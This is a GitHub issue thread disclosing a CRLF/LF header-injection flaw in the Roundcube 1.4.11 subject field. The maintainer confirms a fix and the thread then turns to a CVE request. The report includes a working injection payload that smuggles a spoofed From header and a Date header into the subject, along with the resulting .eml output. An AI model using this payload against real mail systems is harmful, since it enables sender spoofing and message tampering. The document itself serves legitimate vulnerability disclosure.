### ISSUE TITLE
CRLF injection in subject 

### ISSUE THREAD

**Issue by ApmeMka** [roundcube/roundcubemail#8404]
Hi, 

I wrote you on hello@roundcube.net and dev@lists.roundcube.net but didn't get any response.

Sending new email user can modify eml content with LF (%0a) injection in subject. 

Tested in Roundcube 1.4.11

Vulnerable request:

`POST /?_task=mail&_unlock=<...>&_framed=1&_lang=ru HTTP/1.1`
`<...>`

`_subject=TEST%0aFrom:admin@google.com%0aDate:1&<....>`

![image](https://user-images.githubusercontent.com/33625319/149832591-91390074-e745-4c79-af32-ec21bf697516.png)

.eml file:

`MIME-Version: 1.0`
`Date: Mon, 17 Jan 2022 23:17:29 +0300`
`From: s02<...>ru`
`To: <...>`
`Subject: `TEST
From:admin@google.com
Date:1
`User-Agent: Roundcube Webmail/1.4.11`
`Message-ID: <7af972d<..>c76ecc85f3@<..>.ru>`
`X-Sender: s02<...>ru`

**Comment by veteroGGG** [comment]
Good job man

**Comment by alecpl** [comment]
Fixed.

**Comment by inDrApmeM** [comment]
@alecpl,  thanks!

What is about CVE?

**Comment by ApmeMka** [comment]
@alecpl Thanks!

What's about CVE?
Do you register it yourselves or I should write to MITRE?

**Comment by alecpl** [comment]
Please, do it. I have no time and good experience with contacting MITRE.
